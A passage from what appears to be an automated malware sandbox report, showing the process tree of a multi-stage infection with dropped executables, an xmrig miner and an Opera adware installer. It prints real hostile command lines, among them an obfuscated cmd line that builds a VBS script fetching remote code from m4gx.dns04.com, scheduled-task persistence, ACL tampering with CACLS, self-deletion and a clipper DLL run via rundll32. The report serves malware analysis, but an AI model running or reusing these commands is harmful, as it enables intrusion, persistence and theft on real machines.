      4⤵
      PID:5788
- - C:\Users\Admin\AppData\Local\Temp\a\ImxyQs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ImxyQs.exe"
    3⤵
    PID:1584
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /release
      4⤵
      PID:3424
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:4028
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /renew
      4⤵
      PID:5320
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        5⤵
        Gathers network information
        
        PID:6960
  - - C:\Users\Admin\AppData\Local\Temp\V02z6r.exe
      "C:\Users\Admin\AppData\Local\Temp\V02z6r.exe"
      4⤵
      PID:5828
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      4⤵
      PID:7016
- - C:\Users\Admin\AppData\Local\Temp\a\FX_432661.exe
    "C:\Users\Admin\AppData\Local\Temp\a\FX_432661.exe"
    3⤵
    PID:2956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
      4⤵
      PID:3136
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"
        5⤵
        
        PID:3104
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        5⤵
        
        PID:972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        5⤵
        
        PID:3240
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"
        5⤵
        
        PID:3716
    - - \??\c:\Windows\SysWOW64\cmd.exe
        
        cmd /c start C:\Users\Public\bjk6l9.vbs
        5⤵
        
        PID:824
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs"
        6⤵
        
        PID:2560
- - C:\Users\Admin\AppData\Local\Temp\a\newmar.exe
    "C:\Users\Admin\AppData\Local\Temp\a\newmar.exe"
    3⤵
    PID:1356
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:4020
    - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
        5⤵
        
        PID:3240
  - - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
      "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
      4⤵
      PID:2860
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5492
    - - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
        5⤵
        
        PID:10080
  - - C:\Users\Admin\AppData\Local\Temp\kos4.exe
      "C:\Users\Admin\AppData\Local\Temp\kos4.exe"
      4⤵
      PID:3004
    - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        5⤵
        
        PID:5592
      - C:\Users\Admin\AppData\Local\Temp\is-9BTPC.tmp\LzmwAqmV.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9BTPC.tmp\LzmwAqmV.tmp" /SL5="$203D6,2937758,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:5904
  - - C:\Users\Admin\AppData\Local\Temp\latestX.exe
      "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
      4⤵
      PID:1540
- - C:\Users\Admin\AppData\Local\Temp\a\2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\2.exe"
    3⤵
    PID:1480
- - C:\Users\Admin\AppData\Local\Temp\a\nalo.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nalo.exe"
    3⤵
    PID:4196
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2096
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2364
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:5044
- - C:\Users\Admin\AppData\Local\Temp\a\millianozx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\millianozx.exe"
    3⤵
    PID:4160
  - - C:\Users\Admin\AppData\Local\Temp\a\millianozx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\millianozx.exe"
      4⤵
      PID:6052
- - C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe"
    3⤵
    PID:5000
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 768
      4⤵
      Program crash
      PID:5192
- - C:\Users\Admin\AppData\Local\Temp\a\boblspsqgegf.exe
    "C:\Users\Admin\AppData\Local\Temp\a\boblspsqgegf.exe"
    3⤵
    PID:3164
  - - C:\Windows\system32\taskkill.exe
      taskkill /im chrome.exe /T /F
      4⤵
      Kills process with taskkill
      PID:4052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\boblspsqgegf.exe
      4⤵
      PID:5932
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 0
        5⤵
        
        PID:5236
- - C:\Users\Admin\AppData\Local\Temp\a\newumma.exe
    "C:\Users\Admin\AppData\Local\Temp\a\newumma.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3768
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 780
      4⤵
      Program crash
      PID:2572
- - C:\Users\Admin\AppData\Local\Temp\a\ca.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ca.exe"
    3⤵
    PID:4828
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 756
      4⤵
      Program crash
      PID:5528
- - C:\Users\Admin\AppData\Local\Temp\a\fra.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fra.exe"
    3⤵
    PID:4720
- - C:\Users\Admin\AppData\Local\Temp\a\bus50.exe
    "C:\Users\Admin\AppData\Local\Temp\a\bus50.exe"
    3⤵
    PID:2096
  - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Ku7eU69.exe
      C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Ku7eU69.exe
      4⤵
      PID:5152
    - - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\Xp7pI34.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\Xp7pI34.exe
        5⤵
        
        PID:5252
      - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\IU5yX55.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\IU5yX55.exe
        6⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\Vd0iH70.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\Vd0iH70.exe
        7⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\Zw1Vu30.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\Zw1Vu30.exe
        8⤵
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\1xT32lf0.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\1xT32lf0.exe
        9⤵
        
        PID:5580
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        10⤵
        
        PID:5624
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        10⤵
        
        PID:5652
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\2gx4585.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\2gx4585.exe
        9⤵
        
        PID:5728
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        10⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\3WH14Xx.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\3WH14Xx.exe
        8⤵
        
        PID:6140
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\4bx592rs.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\4bx592rs.exe
        7⤵
        
        PID:5340
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:5520
      - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\5ii1rr0.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\5ii1rr0.exe
        6⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
        7⤵
        
        PID:5464
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
        8⤵
        Creates scheduled task(s)
        
        PID:4408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
        8⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        9⤵
        
        PID:6384
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        9⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        9⤵
        
        PID:7632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        9⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        9⤵
        
        PID:5700
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        9⤵
        
        PID:7356
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        8⤵
        
        PID:7312
    - - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\6su6BJ6.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\6su6BJ6.exe
        5⤵
        
        PID:5984
  - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\7qF7Np88.exe
      C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\7qF7Np88.exe
      4⤵
      PID:5864
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\32ED.tmp\32EE.tmp\32EF.bat C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\7qF7Np88.exe"
        5⤵
        
        PID:5448
- - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
    3⤵
    PID:3404
  - - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
      4⤵
      PID:7032
  - - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
      4⤵
      PID:7136
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
        5⤵
        
        PID:356
      - C:\Windows\SysWOW64\PING.EXE
        
        PING 127.0.0.1 -n 2
        6⤵
        Runs ping.exe
        Suspicious behavior: EnumeratesProcesses
        
        PID:2372
      - C:\Windows\Microsoft Media Session\Windows Sessions Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"
        6⤵
        
        PID:9576
        
        C:\Windows\Microsoft Media Session\Windows Sessions Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"
        7⤵
        
        PID:3292
        
        C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        8⤵
        
        PID:9512
- - C:\Windows\SysWOW64\poqexec.exe
    "C:\Windows\SysWOW64\poqexec.exe"
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\raserver.exe
    "C:\Windows\SysWOW64\raserver.exe"
    3⤵
    PID:5812
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:6300
- - C:\Users\Admin\AppData\Local\Temp\a\shareu.exe
    "C:\Users\Admin\AppData\Local\Temp\a\shareu.exe"
    3⤵
    PID:5356
- - C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
    3⤵
    PID:5580
- - C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe
    "C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe"
    3⤵
    PID:5200
- - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
    3⤵
    PID:6032
- - C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe"
    3⤵
    PID:5728
  - - C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe"
      4⤵
      PID:6224
- - C:\Users\Admin\AppData\Local\Temp\a\ch.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ch.exe"
    3⤵
    PID:4124
- - C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"
    3⤵
    PID:5044
  - - C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"
      4⤵
      PID:2840
- - C:\Users\Admin\AppData\Local\Temp\a\Random.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Random.exe"
    3⤵
    PID:2792
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:5844
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:5744
    - - C:\Users\Admin\Pictures\D9FSSEIf0APafWXOaU89wywR.exe
        
        "C:\Users\Admin\Pictures\D9FSSEIf0APafWXOaU89wywR.exe"
        5⤵
        
        PID:6440
    - - C:\Users\Admin\Pictures\pjPNhyfAKA6KSNLyRdkwBLUv.exe
        
        "C:\Users\Admin\Pictures\pjPNhyfAKA6KSNLyRdkwBLUv.exe" --silent --allusers=0
        5⤵
        
        PID:5220
      - C:\Users\Admin\Pictures\pjPNhyfAKA6KSNLyRdkwBLUv.exe
        
        C:\Users\Admin\Pictures\pjPNhyfAKA6KSNLyRdkwBLUv.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6a815648,0x6a815658,0x6a815664
        6⤵
        
        PID:6576
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pjPNhyfAKA6KSNLyRdkwBLUv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pjPNhyfAKA6KSNLyRdkwBLUv.exe" --version
        6⤵
        
        PID:4016
      - C:\Users\Admin\Pictures\pjPNhyfAKA6KSNLyRdkwBLUv.exe
        
        "C:\Users\Admin\Pictures\pjPNhyfAKA6KSNLyRdkwBLUv.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5220 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231027035737" --session-guid=15e3b22c-8a1b-470a-88dc-2ecc97ca9b74 --server-tracking-blob=ZmRkOGQ3YTY5NTVmMGExMDUzN2E4M2I0ZTczNWFjNGNkNGY0MTNmNjczYjYyZjQyODg0NDgxMDk5MjQ3ZGFhNjp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5ODM3ODk0Ny45MDYwIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI0NWZjZTQ3Mi05MTA3LTQzZmUtYmE2Zi00NjU0YWFkNmNmZjEifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=B004000000000000
        6⤵
        
        PID:5556
        
        C:\Users\Admin\Pictures\pjPNhyfAKA6KSNLyRdkwBLUv.exe
        
        C:\Users\Admin\Pictures\pjPNhyfAKA6KSNLyRdkwBLUv.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2c4,0x2c8,0x2cc,0x294,0x2d0,0x693a5648,0x693a5658,0x693a5664
        7⤵
        
        PID:8172
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310270357371\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310270357371\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
        6⤵
        
        PID:1048
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310270357371\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310270357371\assistant\assistant_installer.exe" --version
        6⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310270357371\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310270357371\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x1071588,0x1071598,0x10715a4
        7⤵
        
        PID:4516
    - - C:\Users\Admin\Pictures\bdw3Nkeeel39VFDYbK2Wfakq.exe
        
        "C:\Users\Admin\Pictures\bdw3Nkeeel39VFDYbK2Wfakq.exe"
        5⤵
        
        PID:7036
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c hing.bat
        6⤵
        
        PID:1368
      - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1powerreduceproie.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1powerreduceproie.exe
        6⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\IXP021.TMP\1powerreducepro.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP021.TMP\1powerreducepro.exe
        7⤵
        
        PID:8632
        
        C:\Users\Admin\AppData\Local\Temp\IXP022.TMP\powerreduce.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP022.TMP\powerreduce.exe
        8⤵
        
        PID:5320
    - - C:\Users\Admin\Pictures\o0fYRzQYNN0mQjX0yVAW18cJ.exe
        
        "C:\Users\Admin\Pictures\o0fYRzQYNN0mQjX0yVAW18cJ.exe"
        5⤵
        
        PID:6432
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:968
    - - C:\Users\Admin\Pictures\0mmC1OaCgblRXoZu5NouJD6n.exe
        
        "C:\Users\Admin\Pictures\0mmC1OaCgblRXoZu5NouJD6n.exe"
        5⤵
        
        PID:6364
      - C:\Users\Admin\Pictures\0mmC1OaCgblRXoZu5NouJD6n.exe
        
        "C:\Users\Admin\Pictures\0mmC1OaCgblRXoZu5NouJD6n.exe"
        6⤵
        
        PID:4064
    - - C:\Users\Admin\Pictures\KBKZ54JwENE7dKABR1OTe9tU.exe
        
        "C:\Users\Admin\Pictures\KBKZ54JwENE7dKABR1OTe9tU.exe"
        5⤵
        
        PID:4040
    - - C:\Users\Admin\Pictures\ZVTYjiC9ZDBCd0n5C95YPNEX.exe
        
        "C:\Users\Admin\Pictures\ZVTYjiC9ZDBCd0n5C95YPNEX.exe"
        5⤵
        
        PID:6212
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\ZVTYjiC9ZDBCd0n5C95YPNEX.exe" & exit
        6⤵
        
        PID:8044
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:4520
    - - C:\Users\Admin\Pictures\zXHGT4KyMSKHpkSUWUo6va51.exe
        
        "C:\Users\Admin\Pictures\zXHGT4KyMSKHpkSUWUo6va51.exe"
        5⤵
        
        PID:5988
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6440
    - - C:\Users\Admin\Pictures\k1gbNveJlBLToZAo42oQuh7z.exe
        
        "C:\Users\Admin\Pictures\k1gbNveJlBLToZAo42oQuh7z.exe"
        5⤵
        
        PID:6908
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\k1gbNveJlBLToZAo42oQuh7z.exe" & exit
        6⤵
        
        PID:7884
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:2420
    - - C:\Users\Admin\Pictures\5H4BakC2TohIyIhKRRJJo70h.exe
        
        "C:\Users\Admin\Pictures\5H4BakC2TohIyIhKRRJJo70h.exe"
        5⤵
        
        PID:7120
    - - C:\Users\Admin\Pictures\Zbl8wM3lSyQgFKVUSycAYNMs.exe
        
        "C:\Users\Admin\Pictures\Zbl8wM3lSyQgFKVUSycAYNMs.exe"
        5⤵
        
        PID:2792
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c hing.bat
        6⤵
        
        PID:7188
      - C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\1powerreduceproie.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\1powerreduceproie.exe
        6⤵
        
        PID:9344
    - - C:\Users\Admin\Pictures\oDBkNDwXjGhFm38gntdOEIMB.exe
        
        "C:\Users\Admin\Pictures\oDBkNDwXjGhFm38gntdOEIMB.exe" --silent --allusers=0
        5⤵
        
        PID:4904
      - C:\Users\Admin\Pictures\oDBkNDwXjGhFm38gntdOEIMB.exe
        
        C:\Users\Admin\Pictures\oDBkNDwXjGhFm38gntdOEIMB.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x662d5648,0x662d5658,0x662d5664
        6⤵
        
        PID:5180
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\oDBkNDwXjGhFm38gntdOEIMB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\oDBkNDwXjGhFm38gntdOEIMB.exe" --version
        6⤵
        
        PID:5496
    - - C:\Users\Admin\Pictures\7rcvVFrSA5umcB2M5dFt6j02.exe
        
        "C:\Users\Admin\Pictures\7rcvVFrSA5umcB2M5dFt6j02.exe"
        5⤵
        
        PID:7772
    - - C:\Users\Admin\Pictures\jSp0r3qKMHf7eGayHKSMyY2Z.exe
        
        "C:\Users\Admin\Pictures\jSp0r3qKMHf7eGayHKSMyY2Z.exe"
        5⤵
        
        PID:5228
    - - C:\Users\Admin\Pictures\SUaSX1tMo2e7G1KBOlPErToD.exe
        
        "C:\Users\Admin\Pictures\SUaSX1tMo2e7G1KBOlPErToD.exe"
        5⤵
        
        PID:7588
    - - C:\Users\Admin\Pictures\zathV5v4MaiXT7GEW1Lm0yVL.exe
        
        "C:\Users\Admin\Pictures\zathV5v4MaiXT7GEW1Lm0yVL.exe"
        5⤵
        
        PID:5952
    - - C:\Users\Admin\Pictures\Aae8CBoLcutM6RZxY8n8uWlv.exe
        
        "C:\Users\Admin\Pictures\Aae8CBoLcutM6RZxY8n8uWlv.exe"
        5⤵
        
        PID:7300
      - C:\Users\Admin\Pictures\Aae8CBoLcutM6RZxY8n8uWlv.exe
        
        "C:\Users\Admin\Pictures\Aae8CBoLcutM6RZxY8n8uWlv.exe"
        6⤵
        
        PID:9092
    - - C:\Users\Admin\Pictures\0GU7r9WJzpGpkajGlIe4r0Rw.exe
        
        "C:\Users\Admin\Pictures\0GU7r9WJzpGpkajGlIe4r0Rw.exe"
        5⤵
        
        PID:5636
    - - C:\Users\Admin\Pictures\RoLzToXUDPzflcR73KfnstRN.exe
        
        "C:\Users\Admin\Pictures\RoLzToXUDPzflcR73KfnstRN.exe"
        5⤵
        
        PID:4252
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c hing.bat
        6⤵
        
        PID:9616
